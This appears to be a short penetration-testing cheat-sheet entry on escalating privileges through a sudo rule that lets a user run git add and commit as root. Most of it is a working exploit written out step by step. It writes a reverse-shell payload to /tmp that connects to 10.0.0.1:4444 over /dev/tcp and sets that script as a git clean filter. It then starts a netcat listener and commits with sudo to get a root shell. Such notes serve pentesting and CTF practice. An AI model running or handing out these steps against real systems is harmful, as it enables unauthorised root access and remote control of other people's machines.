Sudo Git Privilege Escalation
Last modified: 2023-03-12
Sudo git is vulnerable to privilege escalation.
Investigation
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"
If we can commit the git repository as root, we may be able to escalate privileges.
Exploitation
1. Create a Payload
echo 'bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"' > /tmp/revshell
chmod +x /tmp/revshell
2. Set Git Config
# Go to the git repository
cd /opt/example
git init
echo '*.php filter=indent' > .git/info/attributes
git config filter.indent.clean /tmp/revshell
3. Commit the Repository
Before committing, we need to start a listener in local machine.
nc -lvnp 4444
Then commit with sudo.
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"
Now we should get a shell in local terminal.